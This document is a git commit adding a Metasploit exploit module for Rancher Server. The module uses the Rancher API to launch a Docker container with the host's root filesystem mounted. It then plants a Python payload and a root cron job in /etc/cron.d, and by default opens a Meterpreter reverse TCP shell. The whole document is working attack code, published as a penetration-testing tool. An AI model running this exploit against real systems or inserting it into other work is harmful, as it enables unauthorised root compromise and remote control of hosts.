Add module Rancher Server - Docker Exploit

mpizala · mpizala · commit 6a20e1ac7dd2 · 2017-07-28T08:04:21.000+02:00
diff --git a/modules/exploits/linux/http/rancher_server.rb b/modules/exploits/linux/http/rancher_server.rb
@@ -0,0 +1,190 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'             => 'Rancher Server - Docker Exploit',
+      'Description'      => %q(
+        Utilizing Rancher Server, an attacker can create a docker container
+        with the '/' path mounted with read/write permissions on the host
+        server that is running the docker container. As the docker container
+        executes command as uid 0 it is honored by the host operating system
+        allowing the attacker to edit/create files owed by root. This exploit
+        abuses this to creates a cron job in the '/etc/cron.d/' path of the
+        host server.
+
+        The Docker image should exist on the target system or be a valid image
+        from hub.docker.com.
+      ),
+      'Author'           => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre
+      'License'          => MSF_LICENSE,
+      'References'       => [
+        'URL'            => 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'
+      ],
+      'Platform'         => 'linux',
+      'Targets'          => [
+        [ 'Python', {
+          'Platform'     => 'python',
+          'Arch'         => ARCH_PYTHON,
+          'Payload'      => {
+            'Compat'     => {
+              'ConnectionType' => 'reverse noconn none tunnel'
+            }
+          }
+        }]
+      ],
+      'DefaultOptions' => { 'WfsDelay' => 75, 'Payload' => 'python/meterpreter/reverse_tcp' },
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 27, 2017'))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'Path to Rancher Environment', '/v1/projects/1a5' ]),
+        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
+        OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ]),
+        OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
+        OptString.new('HttpUsername', [false, 'Rancher API Access Key (Username)']),
+        OptString.new('HttpPassword', [false, 'Rancher API Secret Key (Password)'])
+      ]
+    )
+  end
+
+  def del_container(rancher_container_id, container_id)
+    res = send_request_raw(
+      'method'  => 'DELETE',
+      'headers' => { 'Accept' => 'application/json' },
+      'uri'     => normalize_uri(target_uri.path, 'containers', rancher_container_id)
+    )
+    return vprint_good('The docker container has been removed.') if res && res.code == 200
+
+    print_warning("Manual cleanup of container \"#{container_id}\" is needed on the target.")
+  end
+
+  def make_container_id
+    return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
+
+    rand_text_alpha_lower(8)
+  end
+
+  def make_cmd(mnt_path, cron_path, payload_path)
+    vprint_status('Creating the docker container command')
+    echo_cron_path = mnt_path + cron_path
+    echo_payload_path = mnt_path + payload_path
+
+    cron_command = "python #{payload_path}"
+    payload_data = payload.raw
+
+    command = "echo \"#{payload_data}\" >> #{echo_payload_path} \&\& "
+    command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} \&\& "
+    command << "echo \"\" >> #{echo_cron_path} \&\& "
+    command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}"
+
+    command
+  end
+
+  def make_container(mnt_path, cron_path, payload_path, container_id)
+    vprint_status('Setting container json request variables')
+    {
+      'instanceTriggeredStop'           => 'stop',
+      'startOnCreate'                   => true,
+      'networkMode'                     => 'managed',
+      'type'                            => 'container',
+      'dataVolumes'                     => [ '/:' + mnt_path ],
+      'imageUuid'                       => 'docker:' + datastore['DOCKERIMAGE'],
+      'name'                            => container_id,
+      'command'                         => make_cmd(mnt_path, cron_path, payload_path),
+      'entryPoint'                      => %w[sh -c]
+    }
+  end
+
+  def check
+    res = send_request_raw(
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri.path, 'containers'),
+      'headers' => { 'Accept' => 'application/json' }
+    )
+
+    if res.nil?
+      print_error('Failed to connect to the target')
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res.code == 401 and res.headers.to_json.include? 'X-Rancher-Version'
+      print_error('Authorization is required. Provide valid Rancher API Keys.')
+      return Exploit::CheckCode::Detected
+    end
+
+    if res.code == 200 and res.headers.to_json.include? 'X-Rancher-Version'
+      return Exploit::CheckCode::Appears
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    unless check == Exploit::CheckCode::Appears
+      fail_with(Failure::Unknown, 'Failed to connect to the target')
+    end
+
+    # create required information to create json container information
+    cron_path = '/etc/cron.d/' + rand_text_alpha(8)
+    payload_path = '/tmp/' + rand_text_alpha(8)
+    mnt_path = '/mnt/' + rand_text_alpha(8)
+    container_id = make_container_id
+
+    # deploy docker container
+    res = send_request_raw(
+      'method'  => 'POST',
+      'uri'     => normalize_uri(target_uri.path, 'containers'),
+      'headers' => { 'Accept' => 'application/json', 'Content-Type' => 'application/json' },
+      'data'    => make_container(mnt_path, cron_path, payload_path, container_id).to_json
+    )
+    fail_with(Failure::Unknown, 'Failed to create the docker container') unless res && res.code == 201
+
+    print_good('The docker container is created, waiting for it to deploy')
+
+    # cleanup
+    register_files_for_cleanup(cron_path, payload_path)
+
+    rancher_container_id = JSON.parse(res.body)['id']
+    deleted_container = false
+
+    sleep_time = 5
+    wait_time = datastore['WAIT_TIMEOUT']
+    vprint_status("Waiting up to #{wait_time} seconds until the docker container stops")
+
+    while wait_time.positive?
+      sleep(sleep_time)
+      wait_time -= sleep_time
+
+      res = send_request_raw(
+        'method'  => 'GET',
+        'uri'     => normalize_uri(target_uri.path, 'containers', '?name=' + container_id),
+        'headers' => { 'Accept' => 'application/json' }
+      )
+      next unless res.code == 200 and res.body.include? 'stopped'
+
+      vprint_good('The docker container has stopped, now trying to remove it')
+      del_container(rancher_container_id, container_id)
+      deleted_container = true
+      wait_time = 0
+    end
+
+    # if container does not deploy, try to remove it and fail out
+    unless deleted_container
+      del_container(rancher_container_id, container_id)
+      fail_with(Failure::Unknown, "The docker container failed to start")
+    end
+
+    print_status('Waiting for the cron job to run, can take up to 60 seconds')
+  end
+end
